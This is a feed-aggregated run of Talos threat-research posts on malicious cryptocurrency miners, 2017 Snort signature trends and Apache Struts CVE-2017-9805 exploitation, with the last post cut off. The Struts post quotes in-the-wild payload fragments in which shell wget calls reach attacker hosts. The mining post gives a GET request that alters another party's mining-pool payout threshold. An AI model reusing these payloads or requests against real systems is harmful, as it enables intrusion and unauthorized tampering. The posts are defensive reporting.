In addition to the spam campaigns above, Talos has also observed the RIG exploit kit delivering miners via smokeloader over the last couple of months. The actual infection via the exploit kit is pretty standard for RIG activity.
However, the great thing about mining is that there are easily trackable elements left on the system, namely the 'Worker ID', as shown below:

![Command Line Syntax](https://4.bp.blogspot.com/-cRla5BFyQAo/WnG81bNNsbI/AAAAAAAAAm4/76tiUp0EMDIoF_TkhbSJyUWBXH02-upbACLcBGAs/s1600/image23.png)

Using the Worker ID of:

    43Z8WW3Pt1fiBhxyizs3HxbGLovmqAx5Ref9HHMhsmXR2qGr6Py1oG2QAaMTrmqWQw85sd1oteaThcqreW4JucrLGAqiVQD

we began digging into the number of hashes this system is mining. What we found was a worker fluctuating between 25 KH/s and 60 KH/s. Taking the average at 42.5 KH/s, this actor was earning about $85/day.

That may not seem like a substantial amount of money, but consider that the miner could remain running for months, if not years, without being disrupted and without any additional maintenance required by the actor. The only operational costs are associated with renting the exploit kit and associated infrastructure. Once victims are compromised, the activity continues for a cool $31,000 annually.

However, when we started looking further back, we found this campaign has been ongoing off and on over the last six months, with peak hash rates in excess of 100 KH/s.

![Historical Hash Rate](https://4.bp.blogspot.com/-S2jqc1PAgvQ/WnG9HDPM8zI/AAAAAAAAAm8/9BTHhW1hh2wYgMTCDMX4KXsFvaWSuElKQCLcBGAs/s1600/image16.png)

The campaign appeared to pick up steam beginning in September 2017, but we have evidence of the miners being deployed as far back as June or July of 2017. Suddenly, mining activity completely stopped toward the end of October, then started back up again in mid December. It is still running as of the writing of this post. This shows the earning potential of using an exploit kit to deploy miners via a malware loader like smokeloader.
### Active Exploitation

In addition to threats targeting users, Talos has also observed coin miners being delivered via active exploitation in our honeypot infrastructure. This includes leveraging multiple different exploits to deliver these types of payloads. There have been widespread reports of EternalBlue being used to install miners, as well as various Apache Struts2 exploits, and most recently an Oracle WebLogic exploit. This type of payload is perfect for active exploitation since it doesn't require persistent access to the end system, it is largely transparent to the end user, and it can result in significant financial gain.

When you take threats being delivered to users via email and web, as well as internet-connected systems being compromised to deliver a miner payload, it's obvious that miners are being pushed by adversaries today much like ransomware was being pushed to systems a year ago. Based on this evidence, we began digging a little deeper into the actual mining activity and the systems that have already been mining.

## Deeper Dive on Mining and Workers

Over the course of several months, we began looking for crypto miner activity on systems and uncovered prevalent threats associated with multiple different groups relying on familiar tricks to run on systems. Additionally, we found a large number of enterprise users running or attempting to run miners on their systems for potential personal gain.

One thing that has been common with most of the malicious miners we found is the choice of filenames. Threat actors have chosen filenames that look harmless, such as "Windows 7.exe" and "Windows 10.exe". Additionally, Talos commonly saw "taskmgrss.exe", "AdobeUpdater64.exe", and "svchost.exe". Talos also found examples of miners being pulled dynamically and run via the command line, an example of which is shown below.
![Command Line Syntax](https://3.bp.blogspot.com/-4AgsOM4lq_Y/WnG9YRuQ6vI/AAAAAAAAAnA/0uu00Q-7QMQueR7KPdE5qKzbn_p0K3p9gCLcBGAs/s1600/image28.png)

Interestingly, we also found miners purporting to be anti-virus software, including our own free anti-virus product [Immunet](<http://www.immunet.com/index>).

## Mining as a Payload for the Future

Cryptocurrency miner payloads could be among the easiest money makers available for attackers. This is not meant to encourage attackers, of course, but the reality is that this approach is very effective at generating long-term passive revenue for them. Attackers simply have to infect as many systems as possible, execute the mining software in a manner that makes it difficult to detect, and they can immediately begin generating revenue. Attackers will likely be just as happy computing 10 KH/s as 500 KH/s. If they have a specific hash rate goal, they can simply continue distributing miners to victims until they reach it.

The sheer volume of infected machines is how attackers measure success with these campaigns. Since financial gain via mining is the mission objective, there is no need to compromise hosts to steal documents, passwords, wallets or private keys, as we've grown accustomed to seeing from financially motivated attackers. We have commonly seen ransomware delivered with additional payloads. These can either provide a secondary financial benefit or, in some cases, deliver the real malicious payload. In the latter case ransomware can be used as a smoke screen designed to distract. While we have seen active vulnerability exploitation used as the initial vector for infecting systems with cryptocurrency mining software, that is the extent of the overtly malicious activity. Once a system has become infected in this scenario, attackers are typically focused on maximizing their hash rates and nothing more.
Simply leveraging the resources of a single infected system is likely not profitable enough for most attackers. However, consider 100,000 systems and the profitability of this approach skyrockets. In most cases attackers attempt to generate as much revenue as easily and cheaply as possible. With mining software, they already have their method of gain in the form of control over system resources and the volume of hashes those resources can generate.

Recurring revenue is not just something a legitimate business strives for; malicious adversaries do as well. Complex malware is expensive to design, create, test, and then deliver to victims. Complex malware is often reserved for very complex attacks, and rarely is this type of malware used to attack hundreds of thousands of users. As such, a recurring revenue model isn't really applicable to these complex malware attacks, generally speaking. With cryptominers, attackers have created an entire solution specifically designed to do one thing: generate recurring revenue.

The continuing use of cryptominers as a payload, and the effort to ensure the system is running at full capacity, will continue to evolve. Talos has observed attacks where the attacker cleaned up the machine by removing other miners before infecting the user and installing their own mining software. Attackers are already fighting for these resources, as the potential monetary value and ongoing revenue stream is massive.

## Are Miners Malware?

Mining client software itself should not be considered malware or a Potentially Unwanted Application/Potentially Unwanted Program (PUA/PUP). The legitimate mining client software is simply being leveraged in a malicious way by actors to ensure that they are able to generate revenue by mining on infected machines.
Mining software is written specifically to ensure that the cryptocurrencies being used are available to people, to ensure consensus on the network, to perform and validate transactions, and to reward miners performing the complex mathematical calculations that ensure the integrity and security of the cryptocurrency ecosystem and network.

If a legitimate user runs the mining software locally they can run their own mining platform; likewise, a legitimate user can become part of a pool to try and maximize their chances of receiving a payout. The difference between the legitimate user and a threat actor is that the legitimate user is performing this task intentionally. The malicious actor is performing this task in exactly the same manner as the legitimate user, but without the user's knowledge or consent. The difference is the deception of the end user and the intent behind mining the cryptocurrencies. The software itself is unfortunately part of the malicious arsenal the attacker chooses to use, but, much like when Powershell or PSExec is used in malicious attacks, the software itself is not malicious by design. It is the intent with which it is used that matters. When these miners are leveraged by attackers, victims are unwittingly forced to pay for the electricity used during the mining process and have their computational resources abused to generate revenue for the actors.

## Enterprise Impacts

Regardless of whether the miner was deployed using malicious methods or simply by an enterprise user trying to generate some coin from their work computer, enterprises have to decide whether miners are malware within their environments.

This is an interesting challenge because generally the only thing miners do is utilize CPU/GPU cycles to complete complex math problems. However, this is wasted or stolen resources for an organization, and depending on the configuration of these systems it could have larger impacts.
Obviously, if a miner is placed onto a system via one of the methods discussed above it is a malicious payload. However, Talos found large numbers of users that appeared to willingly run these miners on enterprise systems to generate coin.

Due to the large number of willing users, it might warrant an organization crafting a policy, or adding a section to an existing policy, regarding the use of miners on enterprise systems and how it will be handled. Additionally, it is up to each organization to decide whether or not these files should be treated as malware and removed or quarantined as such.

## Fails we Found

While investigating malware campaigns that were distributing Monero mining software, we observed an interesting case where the attacker used an open-source mining client called 'NiceHash Miner' and began distributing it. In this particular case, the command line syntax used to execute the miner on infected systems is shown below:

![Command Line Syntax](https://4.bp.blogspot.com/-gYfSx4Z3fR4/WnG9hB4ZaOI/AAAAAAAAAnE/EK10eb8tztI0t8vU5UKISuX3zSzLIVjPgCLcBGAs/s1600/image9.png)

Interestingly, the userpass parameter that registers the mining client to the specific Worker ID being used is '3DJhaQaKA6oyRaGyDZYdkZcise4b9DrCi2.Nsikak01'. When analyzing this particular campaign, we identified that this userpass is actually the default userpass specified in the mining software's source code as released on GitHub. The attacker didn't bother to change it, so all of the infected machines were mining Monero that was sent to the mining application's author, not to the attacker.

![Source Code Default Values](https://4.bp.blogspot.com/-Serv6ugXd5s/WnG9qlxt1GI/AAAAAAAAAnI/BQeRNxdbKKkQ3aOYZ2aZrGQFwAa74aOOgCLcBGAs/s1600/image34.png)

In several other cases we observed attackers using default values within the command line syntax used to execute their miners.
A few examples are below:

![Mining Fail Example #1](https://2.bp.blogspot.com/--VxrS9BeGXA/WnG9ydG0RlI/AAAAAAAAAnM/j_rDz4bvK384-fHed56GXcDehQ9P-Dt_QCLcBGAs/s1600/image25.png)

![Mining Fail Example #2](https://3.bp.blogspot.com/-w3Y6QyEIEP8/WnG96btX1wI/AAAAAAAAAnU/5jijQ_mBw6Q89KlaCgw506k5Ef2rNwBgwCLcBGAs/s1600/image8.png)

![Mining Fail Example #3](https://1.bp.blogspot.com/-lzwj4E9U-0o/WnG-Cc7XTYI/AAAAAAAAAnY/MSP3Pngrk0AtEgq5ceto9lyo6cdNFF9lQCLcBGAs/s1600/image3.png)

![Mining Fail Example #4](https://2.bp.blogspot.com/-boqhpLlFsxw/WnG-JhPkK6I/AAAAAAAAAnc/pZdDYcGpxw4B6pFIf6tV65MtkC9f9-7zACLcBGAs/s1600/image1.png)

This clearly indicates that many of the attackers leveraging cryptocurrency miners are extensively using code and command line syntax they find online, and in some cases may not actually understand the code they are working with or how cryptocurrency mining even works. As a result, default values and placeholders are not always updated, preventing them from monetizing or generating revenue from these sorts of attacks.

Additionally, while performing our research we found an interesting way that could, in theory, allow one to manipulate the payouts received by the attackers. Currently, within the web interface used by many of the mining pools (and exposed via an API), there is a "Personal Threshold" value that is publicly editable. This setting determines how much coin must be mined before the payout is sent to the attacker's wallet. By setting this value to a large amount (e.g. 50 XMR), the attacker would have to wait an extended period before receiving their next payout.
While the attacker could just change this value back, it could be changed right back to 50 XMR using a GET request, as long as the request is made to the mining pool's URL using the following structure:

    "https://p5[.]minexmr[.]com/set_info?address=$WORKER&type=thold&amount=50000000000000"

where $WORKER is the 'Worker ID' being modified. This same parameter is available on many of the major mining pool websites that we analyzed. Note that the syntax could differ depending on the pool being used by the adversary.

## Conclusion

The number of ways adversaries are delivering miners to end users is staggering. It is reminiscent of the explosion of ransomware we saw several years ago. This is indicative of a major shift in the types of payloads adversaries are trying to deliver. It helps show that the effectiveness of ransomware as a payload is limited. It will always be effective for ransoming specific organizations or for use in targeted attacks, but as a payload to compromise random victims its reach definitely has limits. At some point the pool of potential victims becomes too small to generate the revenue expected.

Crypto miners may well be the new payload of choice for adversaries. It has been and will always be about money, and crypto mining is an effective way to generate revenue. It's not going to generate large sums of money for each individual system, but when you group together hundreds or thousands of systems it can be extremely profitable. It's also a more covert threat than ransomware. A user is far less likely to know a malicious miner is installed on the system, other than noticing some occasional slowdown. This increases the time a system is infected and generating revenue. In many ways it's the exact opposite of ransomware. Ransomware is designed to generate revenue from a victim in a couple of days, and the payoff is immediate.
Malicious miners are designed to exist on a system for weeks, months, or ideally years.

It also introduces a new challenge to enterprises. A decision needs to be made on how to treat things like miners and whether they should be judged exclusively as malware. Each enterprise needs to decide how to handle these threats. The first step is determining how prevalent they are in your environment, and then deciding how to handle them going forward.

## Coverage

There are different ways to address miners, and there is detection built into Cisco security products to detect this activity. There is a specific detection name in AMP for coin miners, W32.BitCoinMiner. However, as these miners can be added as modules to various other threats, the detection names may vary. Additionally, there are a couple of NGIPS signatures designed to detect mining activity. These rules may not be enabled by default in your environment, depending on the importance of potentially unwanted applications (PUA) in your network. The signatures that detect this type of activity include, but aren't limited to: 40841-40842, 45417, and 45548-45550.

Also, technologies like Threat Grid have created indicators to clearly identify when mining activity is present in a submitted sample.

## IOC Section

### IP Addresses:

89.248.169[.]136
128.199.86[.]57

### Domains:

qyvtls749tio[.]com
youronionlink[.]onion

### [File Hashes](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5a71e1c64654d.txt>)

Post: "Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions" (Talos blog, published 2018-01-31; CVEs referenced: CVE-2017-10271, CVE-2017-3506). Source: <http://feedproxy.google.com/~r/feedburner/Talos/~3/nyH5a-BdwkQ/malicious-xmr-mining.html>

Next post (Talos blog, last seen 2018-01-29):

_This post was written by [Martin Lee](<https://www.blogger.com/profile/17941683095374027310>) and [Vanja Svajcer](<https://twitter.com/vanjasvajcer>)._

2017 was an eventful year for cyber security, with high-profile vulnerabilities that allowed self-replicating worm attacks such as [WannaCry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [BadRabbit](<http://blog.talosintelligence.com/2017/10/bad-rabbit.html>) to impact organizations throughout the world. In 2017, Talos researchers discovered many new attacks, including backdoors in legitimate software such as [CCleaner](<https://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html>), designed to target high tech companies, as well as [M.E.Doc](<http://blog.talosintelligence.com/2017/07/the-medoc-connection.html>), responsible for the initial spread of [Nyetya](<http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>).
Despite all those, headline-making attacks are only a small part of the day-to-day protection provided by security systems.

In this post we review some of the findings created by investigating the most frequently triggered Snort signatures as reported by [Cisco Meraki](<https://meraki.cisco.com>) systems and included in the Snort default policy set.

## Top 5 Signatures

Snort signatures are classified into different classes based on the type of activity detected, with the most commonly reported class type being "Trojan-activity", followed by "Policy-violation" and "Misc-activity". Some less frequently reported class types such as "Attempted-admin" and "Web-application-attack" are particularly interesting in the context of detecting malicious inbound and outbound network traffic.

Snort signatures are identified by three parts: the Generator ID (GID), the Signature ID (SID) and the revision number. The GID identifies what part of Snort generates the event; '1' indicates an event has been generated from the text rules subsystem. The SID uniquely identifies the rule itself. You can search for information on SIDs via the search box on the [Snort website](<https://www.snort.org/>). The revision number is the version of the rule; be sure to use the latest revision of any rule.

Without further ado, here are the top 5 triggered signatures within policy in reverse order, just as you would expect from a yearly Top of the Snort alerts chart.

### #5 - 1:39867:3 "Suspicious .tk dns query"

The .tk top-level domain is owned by the South Pacific territory of Tokelau. The domain registry allows for the registration of domains without payment, which leads to the .tk top-level domain being one of the most prolific in terms of the number of domain names registered.
However, this free registration leads to .tk domains frequently being abused by attackers.

This signature triggers on DNS lookups for .tk domains. Such a case doesn't necessarily mean that the lookup is malicious in nature, but it can be a useful indicator of suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers.

Other, similar signatures detecting DNS lookups to other rarely used top-level domains such as .bit, .pw and .top also made it into our list of the top 20 most triggered rules.

### #4 - 1:23493:6 "Win.Trojan.ZeroAccess outbound connection"

ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine, and serves as a platform for conducting click-fraud campaigns. This rule detects UDP packets sent by an infected system to so-called super nodes, which participate in the network of command and control servers. The rule can be used to block outbound communication from the malware.

ZeroAccess is a state-of-the-art rootkit and is able to hide from basic detection techniques on the infected machine. However, network detection using an IPS such as Snort can quickly pinpoint the source of malicious ZeroAccess traffic, as it generates a fairly noisy and regular communication pattern.

The malware sends a UDP packet to check in with a super node once every second, so a single affected organization is expected to have many alerts. This may be one of the reasons why the ZeroAccess detection signature is placed high on our list.

### #3 - 1:41083:1 "suspicious .bit dns query"

The .bit top-level domain extension is relatively obscure, but is occasionally used for hosting malware C2 systems, with Necurs being one of the families using it as part of its botnet communication.
The .bit TLD is managed using Namecoin, a distributed ledger with no central authority that is one of the first forks of the Bitcoin cryptocurrency. The decentralised nature of .bit domains means that few DNS servers resolve the domains, but equally the domains are resistant to takedown.

The signature triggers on DNS lookups for .bit domains. As with .tk lookups, if the signature triggers, this doesn't necessarily mean that the lookup is malicious in nature. However, a sharp increase in the rule triggering may warrant investigation.

### #2 - 1:42079:1 "Win.Trojan.Jenxcus outbound connection attempt with unique User-Agent"

Jenxcus is more of a worm than a trojan, despite the naming used in the human-readable description of the signature. It spreads by copying itself to removable and shared drives and allows the attacker to remotely access and control the infected system. Like many trojans, once a system is infected, Jenxcus seeks to establish contact with its C2 infrastructure. This contact is made with an HTTP POST request using a specific user-agent string. The user-agent string itself is specific to this trojan and its many variants, and can be detected and blocked using this signature.

### #1 - 1:40522:3 "Unix.Trojan.Mirai variant post compromise fingerprinting"

Internet of Things (IoT) security is something which we have written about [extensively](<http://blog.talosintelligence.com/2017/06/the-internet-of-vulnerable-things.html>). The Mirai botnet, and its variants, continue to try to infect IoT devices by attempting to log in with default usernames and passwords. Once the malware successfully accesses a device, it will check that the device behaves as expected and not like a honeypot. It is this check which is detected by this rule.
This post-compromise activity has been constantly present throughout the year and at the peak of its activity in February accounted for over 20% of all alerts reported daily.

[Figure: mirai.jpg]

## Inbound, Outbound or Internal

Network traffic can cross an IDS from external to internal (inbound), from internal to external (outbound), or pass the sensor without traversing it, as internal traffic. An alert may be triggered and logged for any of these scenarios.

Outbound signatures were triggered during 2017 much more frequently than internal, which in turn were more frequent than inbound, with ratios of approximately 9:6:5. The profile of the alerts is different for each direction. Inbound alerts are likely to detect traffic that can be attributed to attacks on various server-side applications such as web applications or databases. Outbound alerts are more likely to contain detection of outgoing traffic caused by malware-infected endpoints. Internal alerts are most likely to be due to trojan or miscellaneous activity.

Looking at these data sets in more detail gives us the following:

[Figure: inbound.jpg]

"Trojan-activity" class type alerts were dominated by the Mirai post-compromise fingerprinting attempts, but this category also contains blocked attempts to download executable files disguised as plain text, and traffic associated with Zeus, Swabfex, Soaphrish and Glupteba malware.

The "Attempted-user" class type covers attempts to exploit user-level vulnerabilities.
The majority of the most frequently triggered signatures in this set were detected attempts to exploit Internet Explorer vulnerabilities.

For outbound signatures, the most frequently reported class types of detections belong to the "Misc-activity" and "Trojan-activity" classes.

[Figure: outbound.jpg]

The most frequently triggered signatures within the "Trojan-activity" signature class are the Jenxcus and .bit DNS activity signatures discussed above. Other prevalent trojan activity is related to the ZeroAccess, Cidox, Zeus and Ramnit trojans.

For internal traffic, the most frequently reported detection class types belong to the "Misc-activity" and "Trojan-activity" classes.

[Figure: internal.jpg]

Misc-activity signatures include detections for various traffic patterns which do not easily fit into any other specific class type. This includes detection of DNS requests to less common top-level domains like .top, .win and .trade, detection of traffic to domains known to be used by adware and other potentially unwanted applications (PUAs), as well as detection of suspicious HTTP user-agent strings.

## Peaks and Troughs

Attacks are happening continuously. Every hour of the day, every day of the year, signatures are being triggered by the constant background noise of the attackers' activity. However, some signatures are clearly triggered by malicious activity being conducted during a particular period.

On March 6th, Apache disclosed an Apache Struts command injection vulnerability, [CVE-2017-5638](<https://www.cvedetails.com/cve/cve-2017-5638>).
Talos released signature [1:41818](<https://www.snort.org/rule_docs/1-41818>) to detect and block exploitation of the vulnerability. Within a couple of days, attackers were conducting [widespread campaigns](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) to identify and compromise vulnerable systems.

As shown in the graph below, attempts to exploit CVE-2017-5638 comprised more than 20% of all triggering signatures at the peak of the malicious activity. This campaign soon abated, but never ceased completely, until a second large peak in activity occurred over 6 days at the end of October.

[Figure: struts.jpg]

This graph neatly illustrates the importance of patching, as well as of installing and enabling signatures for new vulnerabilities as soon as possible. There may be a very short period of time between the disclosure of a vulnerability and its widespread attempted exploitation by threat actors.

Similarly, once an initial attempt to compromise is over, the same attack may recommence some time later, so defences need to be maintained in order to ensure that systems are kept protected.

Another interesting pattern showing several periods of increased activity can be seen in the timeline for signature [1:40843](<https://www.snort.org/rule_docs/1-40843>). This signature detects and blocks the so-called SSL Death Alert denial of service vulnerability in OpenSSL ([CVE-2016-8610](<https://tools.cisco.com/security/center/viewAlert.x?alertId=49575>)). An attacker can exploit vulnerable systems over the network to consume 100% CPU, preventing the system from responding to legitimate requests.

For extended periods during 2017, this vulnerability was not heavily targeted by attackers.
However, there are very clear periods when attackers were conducting campaigns to exploit this vulnerability.

[Figure: dos.jpg]

Our primary advice is to install patches as soon as possible. However, patched versions of some software packages are not being released for this vulnerability. In this case, upgrading to a non-vulnerable version would be the preferred option, but this may not be possible in every case. Ensuring that vulnerable systems are protected by an IPS with the relevant signatures installed and enabled helps keep malicious traffic from impacting unpatched vulnerable systems.

## Discussion

Snort signatures detect potentially malicious network activity. Understanding why particular signatures are triggered and how they can protect systems is a key part of network security. Snort signatures can detect and block attempts at exploiting vulnerable systems, indicate when a system is under attack or has been compromised, and help keep users safe from interacting with malicious systems. They can also be used to detect reconnaissance and pre-exploitation activity, indicating that an attacker is attempting to identify weaknesses in an organization's security posture. These can be used to indicate when an organization should be in a heightened state of awareness about the activity occurring within its environment and more suspicious of the security alerts being generated.

As the threat environment changes, it is necessary to ensure that the correct signatures are in place protecting systems. Usually, this means ensuring that the most recent signature set has been promptly downloaded and installed.
As shown in the Apache Struts vulnerability data, the time between a vulnerability being discovered and exploited may be short.

Our most commonly triggered signature in 2017, 1:40522:3 "Unix.Trojan.Mirai variant post compromise fingerprinting", highlights the necessity of protecting IoT devices from attack. Malware such as Mirai seeks to compromise these systems to use them as part of a botnet for further malicious behaviour. Network architectures need to take these attacks into consideration and ensure that all networked devices, no matter how small, are protected.

Security teams need to understand their network architectures and the significance of rules triggering in their environment. For a full understanding of the meaning of triggered detections, it is important for the signatures to be open source. Knowing what network content caused a signature to trigger tells you about your network and allows you to keep abreast of the threat environment as well as the available protection.

At Talos, we are proud to maintain a set of open source Snort rules and support the thriving [community of researchers](<https://www.snort.org/community>) contributing to Snort and helping to keep networks secure against attack. We're also proud to contribute to the training and education of network engineers through the [Cisco Networking Academy](<https://www.netacad.com>), as well as through the release of additional [open-source tools](<https://www.talosintelligence.com/software>) and the detailing of attacks on our blog.

There is no doubt that 2018 will bring its own security challenges, and it will be interesting to follow how reported detections evolve over the year together with new threats.
We will make sure to keep you up to date with events relevant to your organizations and networks.

*Source: Talos blog, "2017 in Snort Signatures.", published 2018-01-29, CVEs: CVE-2016-8610, CVE-2017-5638. <http://feedproxy.google.com/~r/feedburner/Talos/~3/ZAu5fhdHIK0/2017-in-snort-signatures.html>*

_This post authored by [Nick Biasini](<https://twitter.com/infosec_nick>) with contributions from [Alex Chiu](<https://twitter.com/nschmx>)._

Earlier this week, a critical vulnerability in [Apache Struts](<https://cwiki.apache.org/confluence/display/WW/S2-052>) was publicly disclosed in a security advisory. This new vulnerability, identified as CVE-2017-9805, manifests due to the way the REST plugin uses XStreamHandler with an instance of XStream for deserialization without any type filtering. As a result, a remote, unauthenticated attacker could achieve remote code execution on a host running a vulnerable version of Apache Struts.

This isn't the only vulnerability that has been recently identified in Apache Struts. [Earlier this year](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), Talos responded to a zero-day vulnerability that was under active exploitation in the wild.
Talos has observed exploitation activity targeting CVE-2017-9805 in a way that is similar to how CVE-2017-5638 was exploited back in March 2017.

### Details

Immediately after the reports surfaced related to this exploit, Talos began researching how it operated and began work to develop coverage to prevent successful exploitation. This was achieved, and we immediately began seeing active exploitation in the wild. Thus far, exploitation appears to be primarily scanning activity, with outbound requests that appear to be identifying systems that are potentially vulnerable. Below is a sample of the type of HTTP requests we have been observing.

> `<string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite</string>`

This would initiate a wget request that would write the contents of the HTTP response to /dev/null. This indicates it is purely scanning activity that identifies to the remote server which websites are potentially vulnerable to this attack. This is also a strong possibility since it includes the compromised website in the URL. There was one other small variation that was conducting a similar request to the same website.

> ``<string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?`echo ...vulnerablesite...`</string>``

During our research we found that the majority of the activity was trying to POST to the path /struts2-rest-showcase/orders/3.
Additionally, most of the exploitation attempts are sending the data to wildkind[.]ru, with a decent amount of the requests originating from the IP address associated with wildkind[.]ru, 188.120.246[.]215.

[Figure: Example of in-the-wild exploitation]

Other exploitation attempts have been identified where Talos believes another threat actor appears to be exploiting the vulnerability for a different purpose. An example of the web requests found in the exploitation attempts can be found below.

> `<string>wget</string><string>hxxp://st2buzgajl.alifuzz[.]com/052</string>`

Unfortunately, we were unable to retrieve the potentially malicious file that was being served at this particular location.
If the previous Struts vulnerability is any indicator, the payloads could vary widely and encompass threats such as DDoS bots, spam bots, and various other malicious payloads.

### IOCs

IP Addresses Observed:

* 188.120.246[.]215
* 101.37.175[.]165
* 162.158.182[.]26
* 162.158.111[.]235
* 141.101.76[.]226
* 141.101.105[.]240

Domains Contacted:

* wildkind[.]ru
* st2buzgajl.alifuzz[.]com

Commonly Used Path:

* /struts2-rest-showcase/orders/3

### Mitigation

Apache has released a new version of Struts that resolves this issue. If you believe that you have a potentially vulnerable version of Apache Struts, there are two options: upgrade to Struts 2.5.13 / Struts 2.3.34, or remove the REST plugin if it's not actively being used. Instructions to achieve this are provided as part of the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-052>) and should be reviewed and tested before applying in a production environment. In the event it's not possible to upgrade or remove the REST plugin, limiting it to serving normal pages and JSON may help limit the risk of compromise.

### Conclusion

This is the latest in a long line of vulnerabilities that are exposing servers to potential exploitation. In today's threat landscape a lot of attention is paid to endpoint systems being compromised, and with good reason, as it accounts for the majority of the malicious activity we observe on a daily basis. However, that does not imply that patching of servers should not be an extremely high priority. These types of systems, if compromised, can potentially expose critical data and systems to adversaries.

The vulnerability is yet another example of how quickly miscreants will move to take advantage of these types of issues.
Within 48 hours of disclosure we were seeing activity exploiting the vulnerability. To their credit, the researchers disclosed the vulnerability responsibly and a patch was available before disclosure occurred. However, with money at stake, bad guys worked quickly to reverse engineer the issue and successfully develop exploit code to take advantage of it. In today's reality you no longer have weeks or months to respond to these types of vulnerabilities; it's now down to days or hours, and every minute counts. Ensure you have protections in place or patches applied to help prevent your enterprise from being impacted.

### Coverage

Talos has released the following Snort rule to address this vulnerability. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://snort.org/products>).

Snort Rule: 44315

[Figure: image1.png]

Network security appliances such as [NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>), [NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>), and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat.

*Source: Talos blog, "Another Apache Struts Vulnerability Under Active Exploitation", published 2017-09-07, CVEs: CVE-2017-5638, CVE-2017-9805. <http://feedproxy.google.com/~r/feedburner/Talos/~3/nXfzZg_yH_w/apache-struts-being-exploited.html>*

_This blog post was authored by Benny Ketelslegers of Cisco Talos_

The cybersecurity field shifted quite a bit in 2018. With the boom of cryptocurrency, we saw a transition from ransomware to [cryptocurrency miners](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>). Talos researchers identified APT campaigns including [VPNFilter](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>), predominantly affecting small business and home office networking equipment, as well as [Olympic Destroyer](<https://blog.talosintelligence.com/2018/02/olympic-destroyer.html>), apparently designed to disrupt the Winter Olympics.

But these headline-generating attacks were only a small part of the day-to-day protection provided by security systems.
In this post, we'll review some of the findings created by investigating the most frequently triggered SNORTⓇ rules as reported by [Cisco Meraki](<https://meraki.cisco.com/>) systems. These rules protected our customers from some of the most common attacks that, even though they aren't as widely known, could be just as disruptive as something like Olympic Destroyer. Snort is a free, open-source network intrusion prevention system. Cisco Talos provides new rule updates to Snort every week to protect against software vulnerabilities and the latest malware.

### Top 5 Rules

Snort rules trigger on network behavior ranging from attempts to probe networked systems and attempts at exploiting systems to known malicious command and control traffic. Each rule detects specific network activity, and each rule has a unique identifier. This identifier is comprised of three parts: the Generator ID (GID), the rule ID (SID) and the revision number. The GID identifies what part of Snort generates the event. For example, "1" indicates an event has been generated from the text rules subsystem. The SID uniquely identifies the rule itself. You can search for information on SIDs via the search tool on the [Snort website](<https://www.snort.org/>). The revision number is the version of the rule. Be sure to use the latest revision of any rule.

Snort rules are classified into different classes based on the type of activity detected, with the most commonly reported class type being "policy-violation", followed by "trojan-activity" and "attempted-admin." Some less frequently reported class types such as "attempted-user" and "web-application-attack" are particularly interesting in the context of detecting malicious inbound and outbound network traffic.

Cisco Meraki-managed devices protect clients' networks and give us an overview of the wider threat environment. These are the five most triggered rules within policy, in reverse order.
#### No. 5: 1:43687:2 "suspicious .top dns query"

The .top top-level domain extension is a generic top-level domain and has been observed in malware campaigns such as the [Angler exploit kit](<https://blog.talosintelligence.com/2016/03/angler-slips-hook.html>) and the [Necurs botnet](<https://blog.talosintelligence.com/2018/01/the-many-tentacles-of-necurs-botnet.html>). This top-level domain can be bought for as little as 1 USD, which is why it is very popular with cybercriminals for their malware and phishing campaigns.

This signature triggers on DNS lookups for .top domains. Such a case doesn't necessarily mean that the lookup is malicious in nature, but it can be a useful indicator of suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers.

#### No. 4: 1:41978:5 "Microsoft Windows SMB remote code execution attempt"

In May 2017, a [vulnerability](<https://www.us-cert.gov/ncas/current-activity/2017/03/16/Microsoft-SMBv1-Vulnerability>) in SMBv1 was published that could allow remote attackers to execute arbitrary code via crafted packets. This led to the outbreak of the network worms [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [Nyetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) in 2017. Although it did not make our top five rules in 2017, it seems there was still a lot of scanning for, or attempts to exploit, this vulnerability in 2018. This shows the importance of network defenses and of patch management programs that apply patches as often as possible.

Organizations should ensure that devices running Windows are fully patched. Additionally, they should have SMB ports 139 and 445 blocked from all externally accessible hosts.

#### No. 3: 1:39867:4 "Suspicious .tk dns query"

The .tk top-level domain is owned by the South Pacific territory of Tokelau. The domain registry allows for the registration of domains without payment, which leads to the .tk top-level domain being one of the most prolific in terms of the number of domain names registered. However, this free registration leads to .tk domains frequently being abused by attackers.

This rule triggers on DNS lookups for .tk domains. Such a case doesn't necessarily mean that the lookup is malicious in nature, but it can be a useful indicator of suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers.

Other, similar rules detecting DNS lookups to other rarely used top-level domains such as .bit, .pw and .top also made it into our list of the top 20 most triggered rules.

#### No. 2: 1:35030:1 & 1:23493:6 "Win.Trojan.Zeus variant outbound connection"

